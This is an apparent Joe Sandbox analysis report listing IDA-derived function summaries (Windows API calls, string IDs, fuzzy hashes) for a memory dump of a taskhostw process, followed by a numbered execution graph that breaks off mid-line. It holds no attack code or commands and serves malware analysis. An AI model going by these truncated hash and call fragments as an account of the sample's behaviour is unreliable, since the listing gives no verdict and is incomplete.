                                                                  • Instruction Fuzzy Hash: A5319EB1120605AAEB109F74DC85AFBB7ADFF48724F108619F9A9D7190DB30AC91CB60
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: InfoItemMenu_memset
                                                                  • String ID: 0
                                                                  • API String ID: 2223754486-4108050209
                                                                  • Opcode ID: 98d381d4794c5cf3cde727054fef99aed000f1245124b3a7ce9b390abd17d505
                                                                  • Instruction ID: dc89e48599501c1b02b083c73d5f068539516571122bd25851750ce74d5eb93e
                                                                  • Opcode Fuzzy Hash: 98d381d4794c5cf3cde727054fef99aed000f1245124b3a7ce9b390abd17d505
                                                                  • Instruction Fuzzy Hash: 7431F931510206DFDF348F58D9857DEBBF5EF15350F15401AFA85A61A0D7709AB8CB90
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00236793
                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0023679E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: Combobox
                                                                  • API String ID: 3850602802-2096851135
                                                                  • Opcode ID: e615d90db14db74b126c84a5999b535ca841ca801fee168cab40af08c8c2944a
                                                                  • Instruction ID: 13d84e923eccf3ad96dcf4e7801aa20fc6e8c4bfdaca76c5593a1d28b7f5ef35
                                                                  • Opcode Fuzzy Hash: e615d90db14db74b126c84a5999b535ca841ca801fee168cab40af08c8c2944a
                                                                  • Instruction Fuzzy Hash: 9411B6B57201097FEF218F54DC89EBB776EEB44368F508124F91497290D6719C718BA0
                                                                  APIs
                                                                    • Part of subcall function 001B1D35: CreateWindowExW.USER32 ref: 001B1D73
                                                                    • Part of subcall function 001B1D35: GetStockObject.GDI32(00000011), ref: 001B1D87
                                                                    • Part of subcall function 001B1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 001B1D91
                                                                  • GetWindowRect.USER32(00000000,?), ref: 00236CA3
                                                                  • GetSysColor.USER32(00000012,?,?,static,?,00000000,?,?,?,00000001,?,?,00000001,?), ref: 00236CBD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                  • String ID: static
                                                                  • API String ID: 1983116058-2160076837
                                                                  • Opcode ID: fcc03d34a1477737c49b11fe008ddd0a84f989287f066200ec3e6111e7467f93
                                                                  • Instruction ID: aaef0c83b53c762fa446dccf99224a5f07a54fbe849af4b31e32949e5a45984e
                                                                  • Opcode Fuzzy Hash: fcc03d34a1477737c49b11fe008ddd0a84f989287f066200ec3e6111e7467f93
                                                                  • Instruction Fuzzy Hash: 1F212CB292020AAFDB04DFA8DD49AFABBB8EB08314F015529FD55D3150D735E860DB50
                                                                  APIs
                                                                  • GetWindowTextLengthW.USER32(00000000,?,?,edit,?,00000000,?,?,?,?,?,?,00000001,?), ref: 002369D4
                                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 002369E3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: LengthMessageSendTextWindow
                                                                  • String ID: edit
                                                                  • API String ID: 2978978980-2167791130
                                                                  • Opcode ID: f9c36a47593b8be4eed95fde22eeca87a3b124443c9346814662119dacdd695e
                                                                  • Instruction ID: c8bd8b14ea6f14035f160c825f6cd1bdcffe6cefee67aa1da42a8ec473bbd2a2
                                                                  • Opcode Fuzzy Hash: f9c36a47593b8be4eed95fde22eeca87a3b124443c9346814662119dacdd695e
                                                                  • Instruction Fuzzy Hash: 4B116DB1520205BBEB104E64ED49BEB376DEB05364F518724F9A4971E0C771DCA09B60
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: InfoItemMenu_memset
                                                                  • String ID: 0
                                                                  • API String ID: 2223754486-4108050209
                                                                  • Opcode ID: 8f9bca346a2e961f67676928929eac28b6950b1c79da3854a59351b822b01d8c
                                                                  • Instruction ID: 0a90f90f2eb867bd434f0ee14cda7fa2099e52526e0b88bec414e2932113b0e9
                                                                  • Opcode Fuzzy Hash: 8f9bca346a2e961f67676928929eac28b6950b1c79da3854a59351b822b01d8c
                                                                  • Instruction Fuzzy Hash: 9211D331D21125EBCB24DF58E848BDDB7E9AB25300F150122FD15AB2A0E770ADB9C791
                                                                  APIs
                                                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00222342
                                                                  • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0022236B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Internet$OpenOption
                                                                  • String ID: <local>
                                                                  • API String ID: 942729171-4266983199
                                                                  • Opcode ID: 80527df429f4ede8356594e117d110dc42096a9a3cfd867c4892b37a6a1ccfcb
                                                                  • Instruction ID: e287414ad19ae5ba7fdc4e99b2eda01509fdc55393200b8c4bf33d95961eb206
                                                                  • Opcode Fuzzy Hash: 80527df429f4ede8356594e117d110dc42096a9a3cfd867c4892b37a6a1ccfcb
                                                                  • Instruction Fuzzy Hash: 21110670521236FADB24CF91AC89EFBFBACFF05351F1042AAF54556000D2B569A8C6F0
                                                                  APIs
                                                                  • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,001B3C26,002752F8,?,?,?), ref: 001C0ACE
                                                                    • Part of subcall function 001B7D2C: _memmove.LIBCMT ref: 001B7D66
                                                                  • _wcscat.LIBCMT ref: 001F5010
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: FullNamePath_memmove_wcscat
                                                                  • String ID: S'
                                                                  • API String ID: 257928180-3501010784
                                                                  • Opcode ID: 32adeeef09e93f41528a4f7a2dc3af230affe6f359716aba8f43729d88dfe537
                                                                  • Instruction ID: 28999966c671ffff7736ab2a0fe5faee53fe8369827ab8a8d78b4e3c53d37bb0
                                                                  • Opcode Fuzzy Hash: 32adeeef09e93f41528a4f7a2dc3af230affe6f359716aba8f43729d88dfe537
                                                                  • Instruction Fuzzy Hash: 721182349042189A8B41EBA4DD01FD9B3B8EF28390B0040A9B94CD7291DBB0DA848B50
                                                                  APIs
                                                                    • Part of subcall function 001B7F41: _memmove.LIBCMT ref: 001B7F82
                                                                    • Part of subcall function 0020AEA4: GetClassNameW.USER32(?,?,000000FF), ref: 0020AEC7
                                                                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 0020902D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: ClassMessageNameSend_memmove
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 372448540-1403004172
                                                                  • Opcode ID: 96f2c22e8ac8c73d40222e5e81b007f1a6722c9f619b97835c21b8bb7b15405c
                                                                  • Instruction ID: b2fd4bac9e7bcf64c23679f7af488ec21140aaa3aa468a7282adac8507616bc1
                                                                  • Opcode Fuzzy Hash: 96f2c22e8ac8c73d40222e5e81b007f1a6722c9f619b97835c21b8bb7b15405c
                                                                  • Instruction Fuzzy Hash: CD01DF71A65309ABCB14EBA0C996EFE73ADDF55340F140029B812632C3DB656E2896B1
                                                                  APIs
                                                                  • VariantInit.OLEAUT32(?), ref: 0020C7F6
                                                                    • Part of subcall function 0020CB06: _memmove.LIBCMT ref: 0020CB50
                                                                    • Part of subcall function 0020CB06: VariantInit.OLEAUT32(00000000), ref: 0020CB72
                                                                    • Part of subcall function 0020CB06: VariantCopy.OLEAUT32(00000000,?), ref: 0020CB7C
                                                                  • VariantClear.OLEAUT32(?), ref: 0020C818
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$Init$ClearCopy_memmove
                                                                  • String ID: d}&
                                                                  • API String ID: 2932060187-4160960680
                                                                  • Opcode ID: d1d8a9fe78beac4762376e936792dbec519fad854ab2c33e39688332d87d7241
                                                                  • Instruction ID: e5d473d423384e934338bcb27a3a8fed8eb16e95b74234081123ae50abbad79e
                                                                  • Opcode Fuzzy Hash: d1d8a9fe78beac4762376e936792dbec519fad854ab2c33e39688332d87d7241
                                                                  • Instruction Fuzzy Hash: A61152B18007089FC710DFA5D8848DAF7F8FF18314B50862EE64AD7611E730A949CF90
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: __calloc_crt
                                                                  • String ID: K
                                                                  • API String ID: 3494438863-4153964727
                                                                  • Opcode ID: fc675e1694061d9c38afe518b907dae0cef97e15bff182515fce2e9d9647b47a
                                                                  • Instruction ID: c2cba9140de2d3aa77cd68d7e1adc1c6f307e9531f879f12acf1a3d6f21eb948
                                                                  • Opcode Fuzzy Hash: fc675e1694061d9c38afe518b907dae0cef97e15bff182515fce2e9d9647b47a
                                                                  • Instruction Fuzzy Hash: 11F0AF71A88F128BFB648F29BD44BA9A7DAE740B20F004077E115CF192EB3494858E9C
                                                                  APIs
                                                                  • __lock.LIBCMT ref: 02A79114
                                                                    • Part of subcall function 02A7918B: __mtinitlocknum.LIBCMT ref: 02A7919D
                                                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 02A79124
                                                                    • Part of subcall function 02A78680: ___addlocaleref.LIBCMT ref: 02A7869C
                                                                    • Part of subcall function 02A78680: ___removelocaleref.LIBCMT ref: 02A786A7
                                                                    • Part of subcall function 02A78680: ___freetlocinfo.LIBCMT ref: 02A786BB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Ex_nolock___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
                                                                  • String ID: 8K
                                                                  • API String ID: 3369060592-2802361588
                                                                  • Opcode ID: d41c92ecd1d7e74e0adb9f475a826e210c9bd16fdcadbad4fdccb8f20f9f3334
                                                                  • Instruction ID: 1ed1f8b0c3a5268e45a876d00f27572a6ed82dc3cb74f4fe5c2b1f44e46b3948
                                                                  • Opcode Fuzzy Hash: d41c92ecd1d7e74e0adb9f475a826e210c9bd16fdcadbad4fdccb8f20f9f3334
                                                                  • Instruction Fuzzy Hash: 8CE0CD316C7301FAD654F7A59E077CEB6515B80732F30035BD005550C0CE7814448D6F

                                                                  Execution Graph

                                                                  Execution Coverage:4.6%
                                                                  Dynamic/Decrypted Code Coverage:0.4%
                                                                  Signature Coverage:0.1%
                                                                  Total number of Nodes:2000
                                                                  Total number of Limit Nodes:49
                                                                  execution_graph 97502 1261016 97507 1264ad2 97502->97507 97517 1280f36 97507->97517 97509 1264ada 97510 126101b 97509->97510 97527 1264a94 97509->97527 97514 1282ec0 97510->97514 97617 1282dc4 97514->97617 97516 1261025 97520 1280f3e 97517->97520 97519 1280f58 97519->97509 97520->97519 97522 1280f5c std::exception::exception 97520->97522 97555 128588c 97520->97555 97572 1283521 DecodePointer 97520->97572 97573 128871b RaiseException 97522->97573 97524 1280f86 97574 1288651 58 API calls _free 97524->97574 97526 1280f98 97526->97509 97528 1264aaf 97527->97528 97529 1264a9d 97527->97529 97531 1264afe 97528->97531 97530 1282ec0 __cinit 67 API calls 97529->97530 97530->97528 97583 12677c7 97531->97583 97535 1264b59 97545 1264b86 97535->97545 97601 1267e8c 97535->97601 97537 1264b7a 97605 1267886 97537->97605 97539 1264bf1 GetCurrentProcess IsWow64Process 97540 1264c0a 97539->97540 97542 1264c20 97540->97542 97543 1264c89 GetSystemInfo 97540->97543 97541 129dbbd 97597 1264c95 97542->97597 97544 1264c56 97543->97544 97544->97510 97545->97539 97545->97541 97548 1264c32 97551 1264c95 2 API calls 97548->97551 97549 1264c7d GetSystemInfo 97550 1264c47 97549->97550 97550->97544 97552 1264c4d FreeLibrary 97550->97552 97553 1264c3a GetNativeSystemInfo 97551->97553 97552->97544 97553->97550 97556 1285907 97555->97556 97566 1285898 97555->97566 97581 1283521 DecodePointer 97556->97581 97558 12858a3 97558->97566 97575 128a2eb 58 API calls 2 library calls 97558->97575 97576 128a348 58 API calls 6 library calls 97558->97576 97577 128321f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97558->97577 97559 128590d 97582 1288ca8 58 API calls __getptd_noexit 97559->97582 97562 12858ff 97562->97520 97563 12858cb RtlAllocateHeap 97563->97562 97563->97566 97565 12858f3 97579 1288ca8 58 API calls __getptd_noexit 97565->97579 97566->97558 97566->97563 97566->97565 97570 12858f1 97566->97570 97578 1283521 DecodePointer 97566->97578 97580 1288ca8 58 API calls __getptd_noexit 97570->97580 97572->97520 97573->97524 97574->97526 97575->97558 97576->97558 97578->97566 97579->97570 97580->97562 97581->97559 97582->97562 97584 1280f36 Mailbox 59 API calls 97583->97584 97585 12677e8 97584->97585 97586 1280f36 Mailbox 59 API calls 97585->97586 97587 1264b16 GetVersionExW 97586->97587 97588 1267d2c 97587->97588 97589 1267da5 97588->97589 97590 1267d38 __NMSG_WRITE 97588->97590 97591 1267e8c 59 API calls 97589->97591 97592 1267d73 97590->97592 97593 1267d4e 97590->97593 97596 1267d56 _memmove 97591->97596 97610 1268189 97592->97610 97609 1268087 59 API calls Mailbox 97593->97609 97596->97535 97598 1264c2e 97597->97598 97599 1264c9e LoadLibraryA 97597->97599 97598->97548 97598->97549 97599->97598 97600 1264caf GetProcAddress 97599->97600 97600->97598 97602 1267e9a 97601->97602 97604 1267ea3 _memmove 97601->97604 97602->97604 97613 1267faf 97602->97613 97604->97537 97606 1267894 97605->97606 97607 1267e8c 59 API calls 97606->97607 97608 12678a4 97607->97608 97608->97545 97609->97596 97611 1280f36 Mailbox 59 API calls 97610->97611 97612 1268193 97611->97612 97612->97596 97614 1267fc2 97613->97614 97616 1267fbf _memmove 97613->97616 97615 1280f36 Mailbox 59 API calls 97614->97615 97615->97616 97616->97604 97618 1282dd0 __write 97617->97618 97625 1283397 97618->97625 97624 1282df7 __write 97624->97516 97642 1289d8b 97625->97642 97627 1282dd9 97628 1282e08 RtlDecodePointer DecodePointer 97627->97628 97629 1282e35 97628->97629 97630 1282de5 97628->97630 97629->97630 97688 1288924 59 API calls __cftof2_l 97629->97688 97639 1282e02 97630->97639 97632 1282e98 EncodePointer EncodePointer 97632->97630 97633 1282e6c 97633->97630 97637 1282e86 EncodePointer 97633->97637 97690 12889e4 61 API calls 2 library calls 97633->97690 97634 1282e47 97634->97632 97634->97633 97689 12889e4 61 API calls 2 library calls 97634->97689 97637->97632 97638 1282e80 97638->97630 97638->97637 97691 12833a0 97639->97691 97643 1289d9c 97642->97643 97644 1289daf EnterCriticalSection 97642->97644 97649 1289e13 97643->97649 97644->97627 97646 1289da2 97646->97644 97673 1283235 58 API calls 3 library calls 97646->97673 97650 1289e1f __write 97649->97650 97651 1289e28 97650->97651 97652 1289e40 97650->97652 97674 128a2eb 58 API calls 2 library calls 97651->97674 97661 1289e61 __write 97652->97661 97677 128899d 58 API calls __malloc_crt 97652->97677 97655 1289e2d 97675 128a348 58 API calls 6 library calls 97655->97675 97657 1289e55 97659 1289e6b 97657->97659 97660 1289e5c 97657->97660 97658 1289e34 97676 128321f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97658->97676 97664 1289d8b __lock 58 API calls 97659->97664 97678 1288ca8 58 API calls __getptd_noexit 97660->97678 97661->97646 97666 1289e72 97664->97666 97667 1289e7f 97666->97667 97668 1289e97 97666->97668 97679 1289fab InitializeCriticalSectionAndSpinCount 97667->97679 97680 1282ed5 97668->97680 97671 1289e8b 97686 1289eb3 LeaveCriticalSection _doexit 97671->97686 97674->97655 97675->97658 97677->97657 97678->97661 97679->97671 97681 1282f07 __dosmaperr 97680->97681 97682 1282ede HeapFree 97680->97682 97681->97671 97682->97681 97683 1282ef3 97682->97683 97687 1288ca8 58 API calls __getptd_noexit 97683->97687 97685 1282ef9 GetLastError 97685->97681 97686->97661 97687->97685 97688->97634 97689->97633 97690->97638 97694 1289ef5 LeaveCriticalSection 97691->97694 97693 1282e07 97693->97624 97694->97693 97695 1261066 97700 126f8cf 97695->97700 97701 126f8f0 97700->97701 97733 1280083 97701->97733 97705 126f937 97706 12677c7 59 API calls 97705->97706 97707 126f941 97706->97707 97708 12677c7 59 API calls 97707->97708 97709 126f94b 97708->97709 97710 12677c7 59 API calls 97709->97710 97711 126f955 97710->97711 97712 12677c7 59 API calls 97711->97712 97713 126f993 97712->97713 97714 12677c7 59 API calls 97713->97714 97715 126fa5e 97714->97715 97743 12760e7 97715->97743 97719 126fa90 97720 12677c7 59 API calls 97719->97720 97721 126fa9a 97720->97721 97771 127ff1e 97721->97771 97723 126fae1 97724 126faf1 GetStdHandle 97723->97724 97725 126fb3d 97724->97725 97780 128015c 97733->97780 97736 128015c 59 API calls 97737 12800c5 97736->97737 97738 12677c7 59 API calls 97737->97738 97739 12800d1 97738->97739 97740 1267d2c 59 API calls 97739->97740 97741 126f8f6 97740->97741 97742 12802e2 6 API calls 97741->97742 97742->97705 97744 12677c7 59 API calls 97743->97744 97745 12760f7 97744->97745 97746 12677c7 59 API calls 97745->97746 97747 12760ff 97746->97747 97787 1275bfd 97747->97787 97750 1275bfd 59 API calls 97751 127610f 97750->97751 97752 12677c7 59 API calls 97751->97752 97753 127611a 97752->97753 97754 1280f36 Mailbox 59 API calls 97753->97754 97755 126fa68 97754->97755 97756 1276259 97755->97756 97757 1276267 97756->97757 97758 12677c7 59 API calls 97757->97758 97759 1276272 97758->97759 97760 12677c7 59 API calls 97759->97760 97761 127627d 97760->97761 97762 12677c7 59 API calls 97761->97762 97763 1276288 97762->97763 97764 12677c7 59 API calls 97763->97764 97765 1276293 97764->97765 97766 1275bfd 59 API calls 97765->97766 97767 127629e 97766->97767 97768 1280f36 Mailbox 59 API calls 97767->97768 97769 12762a5 RegisterWindowMessageW 97768->97769 97769->97719 97772 127ff2e 97771->97772 97773 12b5ac5 97771->97773 97774 1280f36 Mailbox 59 API calls 97772->97774 97790 12c9b90 60 API calls 97773->97790 97776 127ff36 97774->97776 97776->97723 97777 12b5ad0 97781 12677c7 59 API calls 97780->97781 97782 1280167 97781->97782 97783 12677c7 59 API calls 97782->97783 97784 128016f 97783->97784 97785 12677c7 59 API calls 97784->97785 97786 12800bb 97785->97786 97786->97736 97788 12677c7 59 API calls 97787->97788 97789 1275c05 97788->97789 97789->97750 97790->97777 97792 1261055 97797 1262649 97792->97797 97795 1282ec0 __cinit 67 API calls 97796 1261064 97795->97796 97798 12677c7 59 API calls 97797->97798 97799 12626b7 97798->97799 97804 1263582 97799->97804 97802 1262754 97803 126105a 97802->97803 97807 1263416 97802->97807 97803->97795 97813 12635b0 97804->97813 97808 126344e 97807->97808 97812 1263428 _memmove 97807->97812 97811 1280f36 Mailbox 59 API calls 97808->97811 97809 1280f36 Mailbox 59 API calls 97810 126342e 97809->97810 97810->97802 97811->97812 97812->97809 97814 12635a1 97813->97814 97815 12635bd 97813->97815 97814->97802 97815->97814 97816 12635c4 RegOpenKeyExW 97815->97816 97816->97814 97817 12635de RegQueryValueExW 97816->97817 97818 1263614 RegCloseKey 97817->97818 97819 12635ff 97817->97819 97818->97814 97819->97818 97820 1263633 97821 126366a 97820->97821 97822 12636e7 97821->97822 97823 1263688 97821->97823 97860 12636e5 97821->97860 97827 129d24c 97822->97827 97828 12636ed 97822->97828 97824 1263695 97823->97824 97825 126375d PostQuitMessage 97823->97825 97829 129d2bf 97824->97829 97830 12636a0 97824->97830 97861 12636d8 97825->97861 97826 12636ca DefWindowProcW 97826->97861 97870 12711d0 10 API calls Mailbox 97827->97870 97832 1263715 SetTimer RegisterWindowMessageW 97828->97832 97833 12636f2 97828->97833 97885 12c281f 71 API calls _memset 97829->97885 97836 1263767 97830->97836 97837 12636a8 97830->97837 97838 126373e CreatePopupMenu 97832->97838 97832->97861 97834 129d1ef 97833->97834 97835 12636f9 KillTimer 97833->97835 97846 129d228 MoveWindow 97834->97846 97847 129d1f4 97834->97847 97865 12644cb Shell_NotifyIconW _memset 97835->97865 97868 1264531 64 API calls _memset 97836->97868 97842 12636b3 97837->97842 97843 129d2a4 97837->97843 97838->97861 97840 129d273 97871 12711f3 331 API calls Mailbox 97840->97871 97851 126374b 97842->97851 97853 12636be 97842->97853 97843->97826 97884 12b7f5e 59 API calls Mailbox 97843->97884 97846->97861 97848 129d1f8 97847->97848 97849 129d217 SetFocus 97847->97849 97848->97853 97855 129d201 97848->97855 97849->97861 97850 126370c 97866 1263114 DeleteObject DestroyWindow Mailbox 97850->97866 97867 12645df 81 API calls _memset 97851->97867 97852 129d2d1 97852->97826 97852->97861 97853->97826 97872 12644cb Shell_NotifyIconW _memset 97853->97872 97854 126375b 97854->97861 97869 12711d0 10 API calls Mailbox 97855->97869 97860->97826 97863 129d298 97873 12643db 97863->97873 97865->97850 97866->97861 97867->97854 97868->97854 97869->97861 97870->97840 97871->97853 97872->97863 97874 1264406 _memset 97873->97874 97886 1264213 97874->97886 97877 126448b 97879 12644a5 Shell_NotifyIconW 97877->97879 97880 12644c1 Shell_NotifyIconW 97877->97880 97881 12644b3 97879->97881 97880->97881 97890 126410d 97881->97890 97883 12644ba 97883->97860 97884->97860 97885->97852 97887 129d568 97886->97887 97888 1264227 97886->97888 97887->97888 97889 129d571 DestroyIcon 97887->97889 97888->97877 97912 12c302e 62 API calls _W_store_winword 97888->97912 97889->97888 97891 1264129 97890->97891 97911 1264200 Mailbox 97890->97911 97913 1267b76 97891->97913 97894 1264144 97896 1267d2c 59 API calls 97894->97896 97895 129d50d LoadStringW 97898 129d527 97895->97898 97897 1264159 97896->97897 97897->97898 97899 126416a 97897->97899 97900 1267c8e 59 API 